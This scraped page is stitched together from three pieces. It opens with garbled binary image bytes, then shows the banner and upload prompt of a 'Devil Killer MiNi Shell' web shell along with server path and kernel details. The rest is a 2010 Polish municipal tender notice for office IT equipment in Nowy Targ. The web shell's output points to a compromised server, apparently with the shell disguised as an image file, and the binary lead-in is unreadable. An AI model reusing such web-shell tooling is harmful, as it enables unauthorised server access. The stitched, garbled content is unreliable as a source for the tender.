JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100326/67509-N-2010.html

<p class="kh_header"><b>Nowy Targ: Dostawę nowych następujących urządzeń na potrzeby Urzędu Miasta w Nowym Targu: 
1/ część I zamówienia - urządzenie wielofunkcyjne A3 - 1 szt.,
2/ część II zamówienia - drukarka A0 - 1 szt.,
3/ część III zamówienia :
a)zestawy komputerowe  - 3 szt.,
b)monitory - 2 szt.,
c)notebooki - 2 szt.,
d)drukarki atramentowe - 4 szt.,
e)drukarka laserowa -  1 szt.,
f)niszczarki - 4 szt.</b><br>
<b>Numer ogłoszenia: 67509 - 2010; data zamieszczenia: 26.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Nowy Targ , ul. Krzywa 1, 34-400 Nowy Targ, woj. małopolskie, tel. 018 2611244, faks 018 2662312.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowytarg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę nowych następujących urządzeń na potrzeby Urzędu Miasta w Nowym Targu: 
1/ część I zamówienia - urządzenie wielofunkcyjne A3 - 1 szt.,
2/ część II zamówienia - drukarka A0 - 1 szt.,
3/ część III zamówienia :
a)zestawy komputerowe  - 3 szt.,
b)monitory - 2 szt.,
c)notebooki - 2 szt.,
d)drukarki atramentowe - 4 szt.,
e)drukarka laserowa -  1 szt.,
f)niszczarki - 4 szt..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa nowych następujących urządzeń na potrzeby Urzędu Miasta w Nowym Targu: 
1/ część I zamówienia - urządzenie wielofunkcyjne A3 - 1 szt.,
2/ część II zamówienia - drukarka A0 - 1 szt.,
3/ część III zamówienia :
a) zestawy komputerowe - 3 szt.,
b) monitory - 2 szt.,
c) notebooki - 2 szt.,
d) drukarki atramentowe - 4 szt.,
e) drukarka laserowa -  1 szt.,
f) niszczarki - 4 szt.

2. Specyfikacja techniczna urządzeń:
1/ część I zamówienia: urządzenie wielofunkcyjne Kyocera Taskalfa 420i z dwustronnym podajnikiem jednoprzebiegowym i dupleksem + karta drukarki sieciowej + toner + stolik(podstawa) pod urządzenie - ilość 1 sztuka lub urządzenie równorzędne o parametrach nie niższych niż wskazane:
1)technologia laserowa
2)format oryginału A3
3)format kopii A6R-A3
4)prędkość kopiowania i drukowania - min. 42 str. A4/ min.
5)dwustronne kopiowanie
6)dwustronne drukowanie w sieci
7)rozdzielczość kopiowania 600x600 dpi
8)rozdzielczość drukowania 600x600 dpi
9)czas nagrzewania nie dłużej niż 30 sek.
10)czas uzyskania pierwszej kopii nie dłużej niż 5 sek.
11)kopiowanie ciągłe: 1 - 999 kopii
12)pamięć kopiarki min. 2 GB RAM + dysk twardy na min. 160 GB
13)sorter elektroniczny w standardzie
14)zoom 25-400%
15)panel operatora w języku polskim
16)wewnętrzna taca odbioru kopii na min. 250 ark.
17)min. 3 źródła podawania papieru, w tym:
a)min. 2 uniwersalne kasety na min. 500 ark. papieru o gramaturze 60-105 g/m2 
b)  podajnik ręczny na min. 100 ark. papieru o gramaturze 80 g/m2 
18)gramatura papieru w kasecie: 60 - 105 g/m2
19)gramatura papieru w podajniku ręcznym: 45 - 200 g/m2
20)kody użytkownika: min. 100
21)pobór mocy w czasie kopiowania maks. 1,1 kW/h
22)moduł drukarki sieciowej (emulacja PCL6/PostScript3)
23)interfejsy standardowe: Fast Ethernet 10/100, USB 2.0, 
24)pamięć drukarki: min. 1 GB 
25)do oferty należy dołączyć deklarację zgodności CE 
2/ część II zamówienia: drukarka kolor A0 Canon imagePrografIpf755 z cokołem i koszem i zestawem uchwytów do ról RH2-33 - ilość 1 sztuka lub urządzenie równorzędne o parametrach nie niższych niż wskazane:
rozdzielczość	2400 x 1200 dpi
język urządzenia 	GARO, HP-GL/2, HP RTL
interfejs	Typ interfejsu USB 2.0 Hi-Speed: WbudowanyNajwiększa prędkość (12 Mbit/s), Szybkość przesyłania danych (480 Mbit/s), Przekaz masowyTyp złącza: seria B (4 styki)
ethernet	Typ: wbudowanyIEEE 802.3 10base-T, IEEE 802.3u 100base-TX / Autonegocjacje IEEE 802.3 x Pełen dupleks, IEEE 802.3ab 1000base-T / Autonegocjacje
pamięć	nie mniej niż 256MB
dysk twardy	nie mniej niż 80GB
wielkość kropli	nie więcej niż 4pl
obsługa mediów 	rolka: jedna rola, ładowanie od przodu, wydawanie wydruku z przodu urządzeniacięte arkusze: ładowanie z przodu, wydawanie wydruku z przodu urządzenia (podawanie ręczne z wykorzystaniem dźwigni blokady papieru)
typ atramentu	reaktywny atrament wodny i pigmentowy
głowica 	pojedyncza, wspólna dla wszystkich kolorów
minimalna osiągalna grubość linii	0,02mm (teoretycznie)
Usługi dodane:
-instalacja i kalibracja urządzenia w miejscu eksploatacji
-podstawowe szkolenie w zakresie obsługi urządzenia
-konsultacja telefoniczna oraz w miejscu eksploatacji w zakresie problemów w użytkowaniu
3/ część III zamówienia:
1) zestaw komputerowy - ilość 3 sztuki (parametry nie niższe niż podane niżej) .
 
Płyta główna:	Asus P5QL PRO	1 szt.
Pamięć RAM:	GoodRam DDR2 2GB 800MHz CL5	1szt.
Obudowa:	Modecom Step 407 czarny - bez zasilacza	1szt.
Zasilacz:	Logic 500W ATX 12cm FAN PFC bulk	1szt.
Napęd:	LG SuperMulti DVD+/-RW GH22NS50 bulk black (Serial Ata)	1szt.
Karta graficzna:GeForce with CUDA GT220 Gigabyte 1GB HDMI & DVI (PCI-E) OC (DDR3)	1szt.
Procesor:	CORE 2 DUO 2,93GHz BOX E7500 3M LGA-775 1066FSB	1szt.
Dysk twardy:Samsung SpinPoint F1 500 GB (SATA II, 16MB cache, NCQ) 1szt.
System operacyjny:Microsoft Windows 7 Professional PL 32-bit OEM 1szt.
Mysz:	Logitech RX1000 OEM Laser Mouse 	1szt.
Klawiatura:Logitech Internet 350 Keyboard Black USB OEM 1szt.
2) notebook : Asus UL50VG-XX023 SU7300 / 500 / 4GB / GT210M / 15 (zainstalowany system Microsoft Windows 7 Professional PL 64-bit w zestawie (Torba +mysz optyczna) - ilość 2 sztuki,
3) monitor LCD Samsung P2370 - ilość 2 sztuki,
4) drukarka HP Business Inkjet 2800dtn - ilość 1 sztuka,
5) drukarka HP - Officejet Pro 8000 - ilość 2 sztuki,
6) drukarka atramentowa : Epson - Stylus Photo R800 CDW - ilość 1 sztuka,
7) drukarka laserowa A4 Samung ML 3471 ND - - ilość 1 sztuka,
8) niszczarka Sunwood Tarnator C9 - ilość 4 sztuki.
3. Zamawiający dopuszcza składanie ofert równoważnych (nie dotyczy to drukarki wymienionej w ust. 3 pkt 7 która musi być taki jak wymieniony w SIWZ) Oferowane urządzenia nie mogą posiadać jednak parametrów gorszych niż u modeli podanych w specyfikacji istotnych warunków zamówienia.
4. Inne postanowienia dotyczące przedmiotu zamówienia:
1/ wykonawca wykona zamówienie w terminie 14 dni od dnia podpisania umowy,
2/ postanowienia dla urządzenia wielofunkcyjnego:
a) dostawa urządzenia we wskazane miejsce,
b) montaż urządzenia,
c) sprawdzenie poprawności działania urządzenia,
d) sporządzenie protokołu z poprawnego zainstalowania urządzenia,
3/ postanowienia dla drukarki A0:
a) dostawa drukarki we wskazane miejsce,
b) montaż drukarki,
c) sprawdzenie poprawności działania drukarki,
d) sporządzenie protokołu z poprawnego zainstalowania drukarki,
4/ czas reakcji 24 godziny od momentu zgłoszenia awarii, (przez czas reakcji rozumie się przyjazd wykonawcy do Urzędu Miasta od momentu poinformowania go telefonicznie przez Urząd Miasta o awarii urządzeń będących przedmiotem zamówienia i przesłania przez Urząd Miasta na tę okoliczność faksu, jako dowodu zgłoszenia awarii),
5/ czas usunięcia awarii - 24 godzin od zgłoszenia awarii, lub sprzęt zastępczy dotyczy wszystkich urządzeń,
6/ w okresie gwarancji wszelkie koszty związane z dojazdem do zamawiającego, czy też z przesłaniem sprzętu z urzędu do zamawiającego ponosi wykonawca,
7/ wykonawca na koszt własny dostarczy do siedziby zamawiającego przedmiot zamówienia we wskazane przez zamawiającego miejsce,
8/ w przypadku przekroczenia terminu usunięcia awarii lub niedostarczenia sprzętu zastępczego będą naliczane kary umowne w wysokości 1% wartości umowy (brutto) za każdy dzień zwłoki,
9/ wykonawca jest zobowiązany udzielić minimum następującego okresu gwarancji:
a/ urządzenie wielofunkcyjne A3 - 3 lat lub 500 000 kopii
b/ drukarka A0 - 3 lat
c/ zestawy komputerowe - 3 lat,
d/ monitory - 3 lat,
e/ notebooki - 2 lat,
f/ drukarka atramentowa Epson Stylus Photo R800 - 2 lat,
g/ drukarka A4 Samung ML 3471 ND - 2 lat,
h/ drukarki HP Business Inkjet 2800dtn - 1 roku,
i/ drukarki HP - Officejet Pro 8000 - 1 roku,
j/ niszczarki Sunwood Tarnator C9  - 2 lat + 5 lat na noże tnące..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku wykonawców działających przez pełnomocnika - pełnomocnictwo, o którym mowa w Rozdziale XVII ust. 6 pkt 3 specyfikacji istotnych warunków zamówienia, oraz inny dokument potwierdzający umocowanie do podpisania oferty (umożliwiający identyfikację i zgodność podpisu na ofercie),</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z art. 144 ustawy zamawiający informuje, że zmiana postanowień w zawartej umowie może nastąpić w następującym przypadku:
1. Zmiany terminu wykonania umowy o czas opóźnienia jeżeli takie opóźnienie wystąpi lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku zaistnienia przerw w jej wykonaniu z przyczyn niezależnych od wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nowytarg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Nowy Targ 
ul. Krzywa 1
34-400 Nowy Targ 
po. 221 IIp. lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.04.2010 godzina 11:30, miejsce: Urząd Miasta Nowy Targ 
ul. Krzywa 1
34-400 Nowy Targ 
po.101 Sekretariat Burmistrza.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Noe dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem zamówienia jest dostawa nowych następujących urządzeń na potrzeby Urzędu Miasta w Nowym Targu: 
1/ część I zamówienia - urządzenie wielofunkcyjne A3 - 1 szt.,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część I zamówienia: urządzenie wielofunkcyjne Kyocera Taskalfa 420i z dwustronnym podajnikiem jednoprzebiegowym i dupleksem + karta drukarki sieciowej + toner + stolik(podstawa) pod urządzenie - ilość 1 sztuka lub urządzenie równorzędne o parametrach nie niższych niż wskazane:
1)	technologia laserowa
2)	format oryginału A3
3)	format kopii A6R-A3
4)	prędkość kopiowania i drukowania - min. 42 str. A4/ min.
5)	dwustronne kopiowanie
6)	dwustronne drukowanie w sieci
7)	rozdzielczość kopiowania 600x600 dpi
8)	rozdzielczość drukowania 600x600 dpi
9)	czas nagrzewania nie dłużej niż 30 sek.
10)	czas uzyskania pierwszej kopii nie dłużej niż 5 sek.
11)	kopiowanie ciągłe: 1 - 999 kopii
12)	pamięć kopiarki min. 2 GB RAM + dysk twardy na min. 160 GB
13)	sorter elektroniczny w standardzie
14)	zoom 25-400%
15)	panel operatora w języku polskim
16)	wewnętrzna taca odbioru kopii na min. 250 ark.
17)	min. 3 źródła podawania papieru, w tym:
a)	min. 2 uniwersalne kasety na min. 500 ark. papieru o gramaturze 60-105 g/m2 
b)  podajnik ręczny na min. 100 ark. papieru o gramaturze 80 g/m2 
18)	gramatura papieru w kasecie: 60 - 105 g/m2
19)	gramatura papieru w podajniku ręcznym: 45 - 200 g/m2
20)	kody użytkownika: min. 100
21)	pobór mocy w czasie kopiowania maks. 1,1 kW/h
22)	moduł drukarki sieciowej (emulacja PCL6/PostScript3)
23)	interfejsy standardowe: Fast Ethernet 10/100, USB 2.0, 
24)	pamięć drukarki: min. 1 GB 
25)	do oferty należy dołączyć deklarację zgodności CE 
Zamawiający dopuszcza składanie ofert równoważnych Oferowane urządzenia nie mogą posiadać jednak parametrów gorszych niż u modeli podanych w specyfikacji istotnych warunków zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia jest dostawa nowych następujących urządzeń na potrzeby Urzędu Miasta w Nowym Targu: 
część II zamówienia - drukarka A0 - 1 szt.,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część II zamówienia: drukarka kolor A0 Canon imagePrografIpf755 z cokołem i koszem i zestawem uchwytów do ról RH2-33 - ilość 1 sztuka lub urządzenie równorzędne o parametrach nie niższych niż wskazane:
rozdzielczość	2400 x 1200 dpi
język urządzenia 	GARO, HP-GL/2, HP RTL
interfejs	Typ interfejsu USB 2.0 Hi-Speed: WbudowanyNajwiększa prędkość (12 Mbit/s), Szybkość przesyłania danych (480 Mbit/s), Przekaz masowyTyp złącza: seria B (4 styki)
ethernet	Typ: wbudowanyIEEE 802.3 10base-T, IEEE 802.3u 100base-TX / Autonegocjacje IEEE 802.3 x Pełen dupleks, IEEE 802.3ab 1000base-T / Autonegocjacje
pamięć	nie mniej niż 256MB
dysk twardy	nie mniej niż 80GB
wielkość kropli	nie więcej niż 4pl
obsługa mediów 	rolka: jedna rola, ładowanie od przodu, wydawanie wydruku z przodu urządzeniacięte arkusze: ładowanie z przodu, wydawanie wydruku z przodu urządzenia (podawanie ręczne z wykorzystaniem dźwigni blokady papieru)
typ atramentu	reaktywny atrament wodny i pigmentowy
głowica 	pojedyncza, wspólna dla wszystkich kolorów
minimalna osiągalna grubość linii	0,02mm (teoretycznie)
Usługi dodane:
-instalacja i kalibracja urządzenia w miejscu eksploatacji
-podstawowe szkolenie w zakresie obsługi urządzenia
-konsultacja telefoniczna oraz w miejscu eksploatacji w zakresie problemów w użytkowaniu
Zamawiający dopuszcza składanie ofert równoważnych Oferowane urządzenia nie mogą posiadać jednak parametrów gorszych niż u modeli podanych w specyfikacji istotnych warunków zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiotem zamówienia jest dostawa nowych następujących urządzeń na potrzeby Urzędu Miasta w Nowym Targu: 
część III zamówienia :zestawy komputerowe - 3 szt.,b) monitory - 2 szt.,c) notebooki - 2 szt.,
d) drukarki atramentowe - 4 szt.,e) drukarka laserowa -  1 szt.,f) niszczarki - 4 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część III zamówienia:
1) zestaw komputerowy - ilość 3 sztuki (parametry nie niższe niż podane niżej) .
Płyta główna:Asus P5QL PRO 	1 szt
Pamięć RAM:GoodRam DDR2 2GB 800MHz CL5	1szt.
Obudowa:Modecom Step 407 czarny - bez zasilacza 1szt.
Zasilacz:	Logic 500W ATX 12cm FAN PFC bulk	1 szt.
Napęd:	LG SuperMulti DVD+/-RW GH22NS50 bulk black (Serial Ata)1 szt.
Karta graficzna:	GeForce with CUDA GT220 Gigabyte 1GB HDMI & DVI (PCI-E) OC (DDR3)	1 szt.
Procesor:	CORE 2 DUO 2,93GHz BOX E7500 3M LGA-775 1066FSB	1 szt.
Dysk twardy:Samsung SpinPoint F1 500 GB (SATA II, 16MB cache, NCQ)	1szt.
System operacyjny:Microsoft Windows 7 Professional PL 32-bit OEM 1szt.
Mysz:Logitech RX1000 OEM Laser Mouse 1 szt.
Klawiatura: Logitech Internet 350 Keyboard Black USB OEM 1szt.
2) notebook : Asus UL50VG-XX023 SU7300 / 500 / 4GB / GT210M / 15 (zainstalowany system Microsoft Windows 7 Professional PL 64-bit w zestawie (Torba +mysz optyczna) - ilość 2 sztuki,
3) monitor LCD Samsung P2370 - ilość 2 sztuki,
4) drukarka HP Business Inkjet 2800dtn - ilość 1 sztuka,
5) drukarka HP - Officejet Pro 8000 - ilość 2 sztuki,
6) drukarka atramentowa : Epson - Stylus Photo R800 CDW - ilość 1 sztuka,
7) drukarka laserowa A4 Samung ML 3471 ND - - ilość 1 sztuka,
8) niszczarka Sunwood Tarnator C9 - ilość 4 sztuki.

